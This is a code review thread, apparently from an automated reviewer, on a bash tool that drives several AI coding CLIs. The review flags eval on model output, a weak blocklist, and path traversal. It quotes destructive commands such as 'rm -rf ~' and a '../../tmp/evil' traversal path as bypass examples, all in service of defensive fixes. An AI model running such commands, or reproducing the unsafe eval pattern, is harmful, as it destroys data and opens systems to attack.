load_provider from main() after load_ralphrc() (or ensure load_provider is
invoked before any provider-dependent checks), and update call-sites so
validate_allowed_tools runs only after load_provider has loaded the
user-configured RALPH_PROVIDER.
lib/providers/copilot.sh
Outdated
```bash
    $COPILOT_CMD -p "$full_prompt"
        $session_arg
        --allow-all-tools
        --no-ask-user
        > "$output_file" 2>&1
```
🟠 High
providers/copilot.sh:52 Missing backslashes for line continuation causes this to execute as separate commands. The Copilot command runs without its flags, and $output_file ends up empty. Consider adding \ at the end of lines 52-55.
```diff
-    $COPILOT_CMD -p "$full_prompt"
-    $session_arg
-    --allow-all-tools
-    --no-ask-user
-    > "$output_file" 2>&1
+    $COPILOT_CMD -p "$full_prompt" \
+        $session_arg \
+        --allow-all-tools \
+        --no-ask-user \
+        > "$output_file" 2>&1
```
🤖 Prompt for AI
In file lib/providers/copilot.sh around lines 52-56:
Missing backslashes for line continuation causes this to execute as separate commands. The Copilot command runs without its flags, and `$output_file` ends up empty. Consider adding `\` at the end of lines 52-55.
```bash
                    echo "Error: Dangerous command blocked"
                else
                    echo "--- TOOL RESULT ($tool_name) ---"
                    eval "$cmd" 2>&1
```
🔴 Critical
lib/tool_executor.sh:44 Using eval with LLM output is a critical security vulnerability. The blocklist only checks for the literal string rm -rf / and is trivially bypassed (rm -rf ~, rm -rf /*, reverse shells, etc.). Consider removing eval entirely and using a strict allowlist of permitted commands, or sandboxing execution.
🤖 Prompt for AI
In file lib/tool_executor.sh around line 44:
Using `eval` with LLM output is a critical security vulnerability. The blocklist only checks for the literal string `rm -rf /` and is trivially bypassed (`rm -rf ~`, `rm -rf /*`, reverse shells, etc.). Consider removing `eval` entirely and using a strict allowlist of permitted commands, or sandboxing execution.
lib/providers/base.sh
Outdated
```bash
# Load the configured provider
load_provider() {
    local provider_name="${RALPH_PROVIDER:-claude}"
```
🔴 Critical
providers/base.sh:6 RALPH_PROVIDER is used to construct a path without validation. Path traversal sequences like ../../tmp/evil could source arbitrary scripts. Consider validating that the provider name contains only alphanumeric characters and hyphens.
- local provider_name="${RALPH_PROVIDER:-claude}"
+ local provider_name="${RALPH_PROVIDER:-claude}"
+
+ # Validate provider name to prevent path traversal
+ if [[ ! "$provider_name" =~ ^[a-zA-Z0-9_-]+$ ]]; then
+ log_status "ERROR" "Invalid provider name: $provider_name"
+ exit 1
+ fi🚀 Want me to fix this? Reply ex: "fix it for me".
🤖 Prompt for AI
In file lib/providers/base.sh around line 6:
`RALPH_PROVIDER` is used to construct a path without validation. Path traversal sequences like `../../tmp/evil` could source arbitrary scripts. Consider validating that the provider name contains only alphanumeric characters and hyphens.
```bash
    case "$tool_name" in
        "read_file")
            local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s')
```
🔴 Critical
lib/tool_executor.sh:14 Paths from LLM output are used verbatim, enabling path traversal in read_file and write_file. Suggest canonicalizing the path and enforcing it stays within a sandbox/project root (reject .., symlinks, and anything outside) before any I/O.
🤖 Prompt for AI
In file lib/tool_executor.sh around line 14:
Paths from LLM output are used verbatim, enabling path traversal in `read_file` and `write_file`. Suggest canonicalizing the path and enforcing it stays within a sandbox/project root (reject `..`, symlinks, and anything outside) before any I/O.
```bash
            ;;
        "write_file")
            local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s')
            local file_content=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="content">(.*?)<\/arg>/s')
```
🟡 Medium
lib/tool_executor.sh:25 The non-greedy (.*?) regex stops at the first </arg>, silently truncating content containing that literal string (e.g., XML, JSX). Consider using a different delimiter strategy or CDATA-style escaping for the content argument.
🤖 Prompt for AI
In file lib/tool_executor.sh around line 25:
The non-greedy `(.*?)` regex stops at the first `</arg>`, silently truncating content containing that literal string (e.g., XML, JSX). Consider using a different delimiter strategy or CDATA-style escaping for the content argument.
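One possible direction for the truncation issue above is a CDATA-style marker around the content argument. This is a sketch, not the executor's current format: it assumes the prompt can instruct the model to emit `<arg name="content"><![CDATA[ ... ]]></arg>`, and falls back to the plain form otherwise.

```bash
# Sketch: prefer a CDATA-wrapped content argument; fall back to the plain <arg> form.
# A CDATA payload survives literal "</arg>" sequences inside the content.
file_content=$(printf '%s' "$content" | perl -0777 -ne \
    'print $1 if /<arg name="content"><!\[CDATA\[(.*?)\]\]><\/arg>/s')
if [[ -z "$file_content" ]]; then
    file_content=$(printf '%s' "$content" | perl -0777 -ne \
        'print $1 if /<arg name="content">(.*?)<\/arg>/s')
fi
```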
- Update get_session_file_age_hours to return -1 for missing files
- Refactor should_resume_session to use parse_iso_to_epoch
- Add logging to init_claude_session
- Update session continuity tests for provider-based architecture
Actionable comments posted: 1
🤖 Fix all issues with AI agents
In `@lib/providers/claude.sh`:
- Around line 175-179: The global variable LIVE_OUTPUT is being mutated inside
the function, causing the false value to persist across iterations; declare a
local variable (e.g., live_output) initialized from LIVE_OUTPUT at the top of
the function and update that local variable when falling back (set
live_output=false) instead of mutating LIVE_OUTPUT, and then use $live_output
throughout the rest of the function body (analogous to the CLAUDE_OUTPUT_FORMAT
fix).
🧹 Nitpick comments (4)
tests/unit/test_providers.bats (3)
50-69: Function-existence tests don't use run — a source error will abort the entire suite.
If any provider script has a syntax error, source on lines 51/58/65 will cause bats to abort rather than reporting a clean failure for that test. Consider wrapping in run bash -c 'source ... && declare -F ...' or accept this as intentional "fail fast" behavior.
77-88: Consider adding a brief comment explaining the glob-matching test strategy.
These tests validate that Bash(git *) style glob patterns in the whitelist correctly match specific tool invocations while rejecting unauthorized ones. A one-line comment would help future readers understand why parenthesized patterns are significant. As per coding guidelines: "In test files, include comments explaining complex test scenarios and test strategy."
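To illustrate the matching rule these tests exercise, here is a sketch of a hypothetical helper (matches_whitelist is not the project's function) showing how an unquoted right-hand side in [[ ]] makes bash treat a whitelist entry as a glob pattern:

```bash
# Sketch of the glob-matching rule: a whitelist entry may be a pattern like "Bash(git *)".
matches_whitelist() {
    local tool=$1; shift
    local pattern
    for pattern in "$@"; do
        # shellcheck disable=SC2053  # pattern is intentionally unquoted so it glob-matches
        [[ "$tool" == $pattern ]] && return 0
    done
    return 1
}

# matches_whitelist "Bash(git log)"   "Read" "Write" "Bash(git *)"  -> 0 (allowed)
# matches_whitelist "Bash(rm -rf /)"  "Read" "Write" "Bash(git *)"  -> 1 (rejected)
```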
97-115: Good security coverage for provider name validation.
Both path traversal and special character injection are tested. Consider also adding a test for a syntactically valid but non-existent provider (e.g., RALPH_PROVIDER="nonexistent") to exercise the "provider script not found" error path on line 26 of base.sh.
Suggested additional test
```bash
@test "load_provider rejects non-existent provider" {
    export RALPH_PROVIDER="nonexistent_provider"
    export RALPH_HOME="$BATS_TEST_DIRNAME/../.."
    source "$BATS_TEST_DIRNAME/../../lib/providers/base.sh"
    run load_provider
    assert_failure
    [[ "$output" == *"[ERROR] AI provider script not found"* ]]
}
```
lib/providers/claude.sh (1)
78-99: Extract build_loop_context into a shared utility to avoid duplication across providers.
This function is identical in claude.sh, gemini.sh, and copilot.sh. Move it to lib/providers/base.sh (or a shared utility module) to reduce maintenance burden and ensure consistency across all three providers.
```bash
        if [[ "$LIVE_OUTPUT" == "true" ]]; then
            log_status "ERROR" "Live mode requires a built Claude command. Falling back to background mode."
            LIVE_OUTPUT=false
        fi
    fi
```
Global mutation of LIVE_OUTPUT persists across loop iterations.
Same class of bug that was just fixed for CLAUDE_OUTPUT_FORMAT (line 162). If the modern CLI build fails once, LIVE_OUTPUT is permanently flipped to false for all subsequent calls. Use a local variable instead.
Proposed fix
+ local live_output="$LIVE_OUTPUT"
if [[ "$use_modern_cli" != "true" ]]; then
- if [[ "$LIVE_OUTPUT" == "true" ]]; then
+ if [[ "$live_output" == "true" ]]; then
log_status "ERROR" "Live mode requires a built Claude command. Falling back to background mode."
- LIVE_OUTPUT=false
+ live_output=false
fi
fiThen use $live_output in place of $LIVE_OUTPUT throughout the rest of the function body.
🤖 Prompt for AI Agents
In `@lib/providers/claude.sh` around lines 175 - 179, The global variable
LIVE_OUTPUT is being mutated inside the function, causing the false value to
persist across iterations; declare a local variable (e.g., live_output)
initialized from LIVE_OUTPUT at the top of the function and update that local
variable when falling back (set live_output=false) instead of mutating
LIVE_OUTPUT, and then use $live_output throughout the rest of the function body
(analogous to the CLAUDE_OUTPUT_FORMAT fix).
- Move build_loop_context() to lib/providers/base.sh
- Remove duplicates from claude.sh, gemini.sh, and copilot.sh
- Source base.sh in provider scripts
- Restore missing stdin redirect comments in claude.sh
- Update modern CLI tests to match new implementation
Actionable comments posted: 2
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (2)
tests/unit/test_session_continuity.bats (1)
419-434: ⚠️ Potential issue | 🟠 Major
Test sources ralph_loop.sh but init_claude_session now lives in lib/providers/claude.sh.
Line 421 still sources ralph_loop.sh, but init_claude_session was moved to lib/providers/claude.sh as part of this PR. Other tests in this file (lines 438, 447, 456) were updated to source claude.sh. This test will likely fail because init_claude_session won't be defined.
Proposed fix
```diff
-    source "${BATS_TEST_DIRNAME}/../../ralph_loop.sh"
+    source "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh"
```
lib/response_analyzer.sh (1)
857-859: ⚠️ Potential issue | 🔴 Critical
Move all session management functions to lib/response_analyzer.sh and implement missing 24-hour expiration logic.
Per coding guidelines, all seven session management functions must be implemented in lib/response_analyzer.sh with 24-hour expiration and .ralph/.claude_session_id persistence. Currently:
- store_session_id(), get_last_session_id(), should_resume_session() are in response_analyzer.sh
- get_session_id(), reset_session(), log_session_transition(), init_session_tracking() are incorrectly split into a separate lib/session_manager.sh file
- No 24-hour expiration logic exists in any of the session functions
Consolidate all functions into response_analyzer.sh and add validation to enforce 24-hour session expiration.
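A minimal sketch of the missing expiration check. It assumes the JSON session file written by store_session_id ({"session_id": ..., "timestamp": ...}) and the date helpers named elsewhere in this review (get_epoch_seconds, parse_iso_to_epoch); the function name is hypothetical.

```bash
# Sketch: treat a stored session as resumable only if it is younger than 24 hours.
should_resume_session_24h() {
    local session_file="$RALPH_DIR/.claude_session_id"
    [[ -f "$session_file" ]] || return 1
    local ts now session_time
    ts=$(jq -r '.timestamp // empty' "$session_file" 2>/dev/null)
    [[ -n "$ts" ]] || return 1
    now=$(get_epoch_seconds)
    session_time=$(parse_iso_to_epoch "$ts") || return 1
    (( now - session_time < 24 * 3600 ))
}
```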
🤖 Fix all issues with AI agents
In `@lib/providers/claude.sh`:
- Around line 333-340: save_claude_session currently writes the bare session ID
which breaks response_analyzer.sh that expects JSON; update save_claude_session
to emit the same JSON structure as store_session_id (e.g.,
{"session_id":"...","timestamp":"..."}) or, better, call the existing
store_session_id function with the extracted session_id so the file at
$RALPH_DIR/.claude_session_id remains consistent; also modify
init_claude_session to parse the JSON format (reading .session_id and .timestamp
via jq) rather than expecting raw text so get_last_session_id and
should_resume_session keep working.
In `@tests/unit/test_session_continuity.bats`:
- Around line 381-387: The test's assertion in
tests/unit/test_session_continuity.bats incorrectly looks for "Darwin" or
"uname" in get_session_file_age_hours and will always skip; update the test to
assert for the actual cross-platform implementation pattern used in
get_session_file_age_hours (e.g. presence of the stat -c / stat -f / date -r
cascade or the specific sequence of commands used) so it matches the function's
real code path and no longer triggers the skip branch.
🧹 Nitpick comments (4)
lib/response_analyzer.sh (1)
826-841: SC2155: Separate declaration from assignment to avoid masking return values.
Lines 832–833 combine local with command substitution, masking any non-zero exit status from get_epoch_seconds / parse_iso_to_epoch. If parse_iso_to_epoch fails, you silently get the current epoch (per its fallback), making the session appear fresh and resumable — a false positive.
Proposed fix
```diff
 # Calculate session age using date utilities
-    local now=$(get_epoch_seconds)
-    local session_time=$(parse_iso_to_epoch "$timestamp")
+    local now
+    now=$(get_epoch_seconds)
+    local session_time
+    session_time=$(parse_iso_to_epoch "$timestamp")
```
lib/providers/copilot.sh (2)
16-32: Unused variables live_mode and session_file; missing live-mode warning.
live_mode (Line 19) is accepted but never referenced — unlike the Gemini provider, which now emits a warning when live mode is requested but unsupported. session_file (Line 23) is declared but never used anywhere.
Proposed fix
```diff
 local live_mode=$3
 local timestamp=$(date '+%Y-%m-%d_%H-%M-%S')
 local output_file="$LOG_DIR/copilot_output_${timestamp}.log"
-local session_file="$RALPH_DIR/.copilot_session_id"
+if [[ "$live_mode" == "true" ]]; then
+    log_status "WARN" "Live mode is not yet supported for Copilot provider. Falling back to background mode."
+fi
+
 local session_arg=""
```
26-31: CLAUDE_USE_CONTINUE is a provider-specific variable name used across providers.
In a multi-provider architecture, reusing a Claude-specific env var (CLAUDE_USE_CONTINUE) for Copilot session resume is confusing. Consider introducing a provider-agnostic variable (e.g., RALPH_USE_CONTINUE or PROVIDER_USE_CONTINUE) that all providers reference.
lib/providers/claude.sh (1)
15-41: Semver comparison overflows when minor or patch ≥ 100.
The formula major * 10000 + minor * 100 + patch breaks for versions like 2.100.0: it maps to 2 * 10000 + 100 * 100 + 0 = 30000, which still sorts above 2.99.99 (= 29999) but collides with 3.0.0 (= 30000). This is unlikely for Claude CLI versions in practice, but worth noting.
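If the collision ever matters, a component-wise comparison avoids the weighting scheme entirely. A sketch assuming dot-separated numeric versions; version_ge is a hypothetical helper, not the function in claude.sh:

```bash
# Sketch: compare versions field by field instead of weighting them.
# Returns 0 when $1 >= $2.
version_ge() {
    local -a a b
    IFS='.' read -ra a <<< "$1"
    IFS='.' read -ra b <<< "$2"
    local i
    for i in 0 1 2; do
        local x=${a[i]:-0} y=${b[i]:-0}
        (( x > y )) && return 0
        (( x < y )) && return 1
    done
    return 0
}

# version_ge "2.100.0" "3.0.0"  -> 1 (correctly treated as older)
```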
```bash
# Save session ID after successful execution
save_claude_session() {
    local output_file=$1
    if [[ -f "$output_file" ]]; then
        local session_id=$(jq -r '.metadata.session_id // .session_id // empty' "$output_file" 2>/dev/null)
        [[ -n "$session_id" && "$session_id" != "null" ]] && echo "$session_id" > "$RALPH_DIR/.claude_session_id"
    fi
}
```
Session file format mismatch — save_claude_session writes raw text but get_last_session_id expects JSON.
save_claude_session (Line 338) writes the bare session ID to $RALPH_DIR/.claude_session_id:
echo "$session_id" > "$RALPH_DIR/.claude_session_id"
But in lib/response_analyzer.sh, store_session_id writes JSON {"session_id": "...", "timestamp": "..."} to the same file, and get_last_session_id reads it with jq -r '.session_id'. Similarly, should_resume_session reads .timestamp from this file.
When save_claude_session runs after a successful Claude execution, it overwrites the file with raw text, breaking get_last_session_id and should_resume_session on the next loop iteration.
Proposed fix — use store_session_id for consistent format
save_claude_session() {
local output_file=$1
if [[ -f "$output_file" ]]; then
- local session_id=$(jq -r '.metadata.session_id // .session_id // empty' "$output_file" 2>/dev/null)
- [[ -n "$session_id" && "$session_id" != "null" ]] && echo "$session_id" > "$RALPH_DIR/.claude_session_id"
+ local session_id
+ session_id=$(jq -r '.metadata.session_id // .session_id // empty' "$output_file" 2>/dev/null)
+ [[ -n "$session_id" && "$session_id" != "null" ]] && store_session_id "$session_id"
fi
}Also update init_claude_session to read the JSON format:
else
- local session_id=$(cat "$session_file" 2>/dev/null)
+ local session_id
+ session_id=$(jq -r '.session_id // ""' "$session_file" 2>/dev/null)🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 337-337: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/providers/claude.sh` around lines 333 - 340, save_claude_session
currently writes the bare session ID which breaks response_analyzer.sh that
expects JSON; update save_claude_session to emit the same JSON structure as
store_session_id (e.g., {"session_id":"...","timestamp":"..."}) or, better, call
the existing store_session_id function with the extracted session_id so the file
at $RALPH_DIR/.claude_session_id remains consistent; also modify
init_claude_session to parse the JSON format (reading .session_id and .timestamp
via jq) rather than expecting raw text so get_last_session_id and
should_resume_session keep working.
```bash
@test "init_claude_session uses cross-platform stat command" {
    # Check for uname or Darwin/Linux detection in get_session_file_age_hours
    run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../ralph_loop.sh"
    run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh"

    # Should have cross-platform handling
    [[ "$output" == *"Darwin"* ]] || [[ "$output" == *"uname"* ]] || skip "Cross-platform stat not yet implemented"
}
```
Test assertion doesn't match current implementation — will always skip.
This test checks for "Darwin" or "uname" in get_session_file_age_hours, but the actual implementation (in claude.sh lines 347-349) uses a stat -c → stat -f → date -r cascade without any uname or Darwin detection. The test will always hit the skip branch.
Consider updating the assertion to match the actual cross-platform strategy:
- [[ "$output" == *"Darwin"* ]] || [[ "$output" == *"uname"* ]] || skip "Cross-platform stat not yet implemented"
+ [[ "$output" == *"stat"* ]] || skip "Cross-platform stat not yet implemented"📝 Committable suggestion
```bash
@test "init_claude_session uses cross-platform stat command" {
    # Check for uname or Darwin/Linux detection in get_session_file_age_hours
    run grep -A30 'get_session_file_age_hours' "${BATS_TEST_DIRNAME}/../../lib/providers/claude.sh"

    # Should have cross-platform handling
    [[ "$output" == *"stat"* ]] || skip "Cross-platform stat not yet implemented"
}
```
🤖 Prompt for AI Agents
In `@tests/unit/test_session_continuity.bats` around lines 381 - 387, The test's
assertion in tests/unit/test_session_continuity.bats incorrectly looks for
"Darwin" or "uname" in get_session_file_age_hours and will always skip; update
the test to assert for the actual cross-platform implementation pattern used in
get_session_file_age_hours (e.g. presence of the stat -c / stat -f / date -r
cascade or the specific sequence of commands used) so it matches the function's
real code path and no longer triggers the skip branch.
Actionable comments posted: 1
🤖 Fix all issues with AI agents
In `@lib/providers/copilot.sh`:
- Around line 38-42: Check that the prompt file exists and is readable before
using cat: in copilot.sh, before computing prompt_content and full_prompt, test
"$prompt_file" (or use [[ -r $prompt_file ]]) and if it is missing/unreadable
call processLogger or fprintf to stderr and exit/non-zero; update the logic
around build_loop_context, prompt_content, and full_prompt so you never
construct full_prompt from an empty prompt_content when the file is absent.
🧹 Nitpick comments (5)
lib/providers/base.sh (1)
36-49: Separate declaration from assignment to avoid masking return values.ShellCheck SC2155 applies to lines 37, 42, and 47. While the risk is low here (values are guarded by null/empty checks), separating
localdeclarations from command substitutions is a good habit — it preserves the exit status for debugging and future error handling.♻️ Proposed fix (example for line 37; apply same pattern to lines 42 and 47)
if [[ -f "$RALPH_DIR/fix_plan.md" ]]; then - local incomplete_tasks=$(grep -cE "^[[:space:]]*- \[ \]" "$RALPH_DIR/fix_plan.md" 2>/dev/null || true) + local incomplete_tasks + incomplete_tasks=$(grep -cE "^[[:space:]]*- \[ \]" "$RALPH_DIR/fix_plan.md" 2>/dev/null || true) context+="Remaining tasks: ${incomplete_tasks:-0}. " fi if [[ -f "$RALPH_DIR/.circuit_breaker_state" ]]; then - local cb_state=$(jq -r '.state // "UNKNOWN"' "$RALPH_DIR/.circuit_breaker_state" 2>/dev/null) + local cb_state + cb_state=$(jq -r '.state // "UNKNOWN"' "$RALPH_DIR/.circuit_breaker_state" 2>/dev/null) [[ "$cb_state" != "CLOSED" && -n "$cb_state" && "$cb_state" != "null" ]] && context+="Circuit breaker: $cb_state. " fi if [[ -f "$RALPH_DIR/.response_analysis" ]]; then - local prev_summary=$(jq -r '.analysis.work_summary // ""' "$RALPH_DIR/.response_analysis" 2>/dev/null | head -c 200) + local prev_summary + prev_summary=$(jq -r '.analysis.work_summary // ""' "$RALPH_DIR/.response_analysis" 2>/dev/null | head -c 200) [[ -n "$prev_summary" && "$prev_summary" != "null" ]] && context+="Previous: $prev_summary" filib/providers/copilot.sh (2)
22-35: Unused variables and a fragile `session_arg` string; use an array like `gemini.sh`.

- `live_mode` (line 22) is accepted but never used. Gemini's provider now logs a warning when live mode is requested but unsupported; Copilot should do the same.
- `session_file` (line 26) is declared but never referenced (dead code).
- `$session_arg` on line 56 relies on word splitting. `gemini.sh` was already refactored to use an array for this; Copilot should follow the same pattern for consistency and robustness.

♻️ Proposed fix
     local prompt_file=$2
-    local live_mode=$3
-
+    local live_mode=$3
+
+    if [[ "$live_mode" == "true" ]]; then
+        log_status "WARN" "Live mode is not yet supported for Copilot provider. Falling back to background mode."
+    fi
+
     local timestamp=$(date '+%Y-%m-%d_%H-%M-%S')
     local output_file="$LOG_DIR/copilot_output_${timestamp}.log"
-    local session_file="$RALPH_DIR/.copilot_session_id"
-    local session_arg=""
+    local -a session_args=()

     if [[ "$CLAUDE_USE_CONTINUE" == "true" ]]; then
-        # Copilot uses --resume [sessionId]
-        # We need to extract the session ID from previous runs if possible
-        # Currently we don't have a reliable way to get sessionId from stdout unless we parse it
-        # For now, we try --resume without ID which resumes "most recent"
-        session_arg="--resume"
+        session_args=("--resume")
     fi

And update the invocation:
-    $COPILOT_CMD -p "$full_prompt" \
-        $session_arg \
+    "$COPILOT_CMD" -p "$full_prompt" \
+        "${session_args[@]}" \
         --allow-all-tools \
         --no-ask-user \
         > "$output_file" 2>&1
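As a standalone illustration (hypothetical function and values, not the provider's real code), a quoted array expansion contributes exactly zero or more intact words, which is what makes it safer than an unquoted string for optional flags:

show_words() { echo "received $# word(s): $*"; }

demo_optional_flag() {
    local -a session_args=()
    [[ "${1:-}" == "resume" ]] && session_args=("--resume")
    # Quoted array expansion: zero words when empty, one intact word otherwise.
    show_words "${session_args[@]}"
}

demo_optional_flag resume   # received 1 word(s): --resume
demo_optional_flag          # received 0 word(s):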
29-29: `CLAUDE_USE_CONTINUE` is a Claude-specific name used across all providers.

All three providers (Claude, Gemini, Copilot) check `CLAUDE_USE_CONTINUE` to decide whether to resume sessions. This variable should be provider-agnostic, e.g., `RALPH_USE_CONTINUE` or `PROVIDER_USE_CONTINUE`, since it governs cross-provider behavior. The current name is confusing and will mislead anyone configuring a non-Claude provider.

This applies equally in `gemini.sh` (line 31) and throughout `claude.sh`.

lib/providers/claude.sh (2)
28-34: Version array parsing is fragile with globbing; use `read -ra` instead.

Lines 30-31 use unquoted `${version//./ }` to split version strings into arrays, which relies on word splitting and is susceptible to globbing (ShellCheck SC2206). If a version component happens to match a filename glob pattern, it could expand unexpectedly.

♻️ Proposed fix
-    local ver_parts=(${version//./ })
-    local req_parts=(${required//./ })
+    local -a ver_parts
+    IFS='.' read -ra ver_parts <<< "$version"
+    local -a req_parts
+    IFS='.' read -ra req_parts <<< "$required"
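A quick illustration of the difference, with an assumed version string and runnable in any directory; the unquoted expansion is subject to pathname expansion, while read -ra splits only on the chosen IFS:

version="1.2.10"

# Fragile: each component goes through word splitting *and* pathname expansion.
unsafe_parts=(${version//./ })

# Safer: split on '.' only; no glob expansion of the components.
IFS='.' read -ra ver_parts <<< "$version"
echo "major=${ver_parts[0]} minor=${ver_parts[1]} patch=${ver_parts[2]}"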
273-280: `$?` on line 280 captures `record_loop_result`'s exit status, which is correct but fragile.

The `[[ $? -ne 0 ]] && return 3` on line 280 depends on nothing executing between `record_loop_result` (line 279) and the `$?` check. This is correct today but fragile: any future insertion between these lines would silently break the check. Consider capturing the exit code directly.

♻️ Suggested alternative
-    record_loop_result "$loop_count" "$files_changed" "$has_errors" "$output_length"
-    [[ $? -ne 0 ]] && return 3
+    if ! record_loop_result "$loop_count" "$files_changed" "$has_errors" "$output_length"; then
+        return 3
+    fi
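Another option, shown here with a stand-in function since record_loop_result lives in the provider, is to capture the status into a variable so later insertions cannot clobber $?:

might_fail() { return "${1:-0}"; }   # stand-in for record_loop_result

check_result() {
    might_fail 3
    local rc=$?
    # Logging or bookkeeping added here no longer disturbs the check below.
    if (( rc != 0 )); then
        return 3
    fi
}

check_result
echo "check_result returned $?"   # 3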
    local loop_context=$(build_loop_context "$loop_count")
    local prompt_content=$(cat "$prompt_file")
    local full_prompt="$loop_context

$prompt_content"
Prompt file existence is not checked before cat.
If $prompt_file is missing or unreadable, cat will fail silently (stderr goes to the log) and full_prompt will contain only the loop context. This could send a malformed prompt to Copilot without any warning.
♻️ Proposed fix
local loop_context=$(build_loop_context "$loop_count")
- local prompt_content=$(cat "$prompt_file")
+ if [[ ! -f "$prompt_file" ]]; then
+ log_status "ERROR" "Prompt file not found: $prompt_file"
+ return 1
+ fi
+ local prompt_content
+ prompt_content=$(cat "$prompt_file")📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
-    local loop_context=$(build_loop_context "$loop_count")
-    local prompt_content=$(cat "$prompt_file")
-    local full_prompt="$loop_context
-$prompt_content"
+    local loop_context=$(build_loop_context "$loop_count")
+    if [[ ! -f "$prompt_file" ]]; then
+        log_status "ERROR" "Prompt file not found: $prompt_file"
+        return 1
+    fi
+    local prompt_content
+    prompt_content=$(cat "$prompt_file")
+    local full_prompt="$loop_context
+$prompt_content"
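A variant of the same guard that also catches a present-but-unreadable file, sketched with a plain stderr message in place of the repository's log_status helper:

read_prompt() {
    local prompt_file=$1
    if [[ ! -r "$prompt_file" ]]; then
        echo "ERROR: prompt file missing or unreadable: $prompt_file" >&2
        return 1
    fi
    cat "$prompt_file"
}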
🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 38-38: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 39-39: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/providers/copilot.sh` around lines 38-42: check that the prompt file
exists and is readable before using cat: before computing prompt_content and
full_prompt, test "$prompt_file" (for example with [[ -r $prompt_file ]]) and, if
it is missing or unreadable, log an error to stderr (e.g. via log_status) and
return a non-zero status; update the logic around build_loop_context,
prompt_content, and full_prompt so full_prompt is never constructed from an empty
prompt_content when the file is absent.
Actionable comments posted: 1
🤖 Fix all issues with AI agents
In `@ralph_loop.sh`:
- Around lines 672-674: The provider scripts (copilot.sh and gemini.sh) do not
follow the exit-code contract expected by provider_execute/ralph_loop.sh
(0=success, 2=API limit, 3=circuit breaker) causing API-limit and
circuit-breaker branches to never run; update the provider implementations so
their entrypoint (the function or script invoked by provider_execute) returns 0
on success, 2 when an upstream API-rate/limit error is detected, and 3 when a
circuit-breaker/blacklist condition is hit (mirror how claude.sh does it);
ensure any internal helpers or wrapper functions used by provider_execute
propagate these numeric exit codes instead of collapsing to 0/1 so
provider_execute "$loop_count" "$PROMPT_FILE" "$LIVE_OUTPUT" yields the correct
exec_result for ralph_loop.sh to handle.
🧹 Nitpick comments (2)
lib/session_manager.sh (2)
26-26: SC2155: Declare and assign separately to avoid masking return values.

Multiple lines combine a `local` declaration with command substitution (e.g., `local ts=$(get_iso_timestamp)`). If the command fails, its non-zero exit code is masked by the `local` builtin's success. This is flagged by ShellCheck (SC2155) on lines 26, 59, 61, 91, 93, 114, and 115.

For example:
Pattern to apply throughout
-    local ts=$(get_iso_timestamp)
+    local ts
+    ts=$(get_iso_timestamp)

Also applies to: 59-59, 61-61, 91-91, 93-93, 114-115
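The masking is easy to demonstrate in isolation; this small sketch is not from the repository and only shows the behavior SC2155 warns about:

demo_sc2155() {
    local combined=$(false)    # `local` itself succeeds, so $? is 0 here
    echo "combined:  exit status seen = $?"

    local separated
    separated=$(false)         # a plain assignment keeps the substitution's status
    echo "separated: exit status seen = $?"
}

demo_sc2155   # prints 0 for the combined form, 1 for the separated form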
4-7: Consolidate duplicate variable definitions with `ralph_loop.sh`.

`RALPH_SESSION_FILE`, `RALPH_SESSION_HISTORY_FILE`, and `CLAUDE_SESSION_FILE` are defined here (lines 5–7) and again in `ralph_loop.sh` (lines 59, 64–65). Although `session_manager.sh` is sourced first (line 24 of `ralph_loop.sh`), the later definitions in `ralph_loop.sh` overwrite these values. While the values are identical today, this duplication creates a maintenance trap: changes in one file won't propagate unless both are updated.

Define these paths in exactly one location (preferably in `session_manager.sh`, since it is the session management module) and remove the duplicates from `ralph_loop.sh`.
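One way to keep a single source of truth is to define the variables only if unset, so whichever file is sourced second no longer overwrites them; the default values below are placeholders, not the project's actual paths:

# In session_manager.sh (illustrative defaults only):
: "${RALPH_SESSION_FILE:=$RALPH_DIR/.ralph_session}"
: "${RALPH_SESSION_HISTORY_FILE:=$RALPH_DIR/.ralph_session_history}"
: "${CLAUDE_SESSION_FILE:=$RALPH_DIR/.claude_session_id}"
# ralph_loop.sh can then drop its duplicate assignments, or adopt the same
# ":=" form so an already-set value is never clobbered.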
    # Execute AI provider
    provider_execute "$loop_count" "$PROMPT_FILE" "$LIVE_OUTPUT"
    local exec_result=$?
🧩 Analysis chain
🏁 Script executed:
# First, let's find the provider files
find . -path "*/providers/*.sh" -type f | head -20

Repository: frankbria/ralph-claude-code
Length of output: 173
🏁 Script executed:
# Let's check the ralph_loop.sh to see what exit codes it actually handles
rg -n -A 5 'case.*exec_result' ralph_loop.sh

Repository: frankbria/ralph-claude-code
Length of output: 53
🏁 Script executed:
# Check provider_execute function signatures and exit codes in all providers
echo "=== Searching for provider_execute definitions and returns ==="
rg -n -B 2 -A 15 'provider_execute\s*\(' lib/providers/*.sh 2>/dev/null | head -100

Repository: frankbria/ralph-claude-code
Length of output: 3455
🏁 Script executed:
# Get complete provider_execute implementations with all returns
echo "=== claude.sh execute_claude_code returns ==="
rg -n 'return|exit' lib/providers/claude.sh | grep -E 'return [0-9]|exit [0-9]'
echo ""
echo "=== copilot.sh provider_execute returns ==="
rg -n 'return|exit' lib/providers/copilot.sh | grep -E 'return [0-9]|exit [0-9]'
echo ""
echo "=== gemini.sh provider_execute returns ==="
rg -n 'return|exit' lib/providers/gemini.sh | grep -E 'return [0-9]|exit [0-9]'
echo ""
echo "=== ralph_loop.sh exit code handling (broader search) ==="
rg -n -B 2 -A 5 'exec_result' ralph_loop.sh | head -80

Repository: frankbria/ralph-claude-code
Length of output: 1906
🏁 Script executed:
# Search for the response_analysis or exit signal handling in ralph_loop.sh
echo "=== Looking for exit signal and response_analysis handling ==="
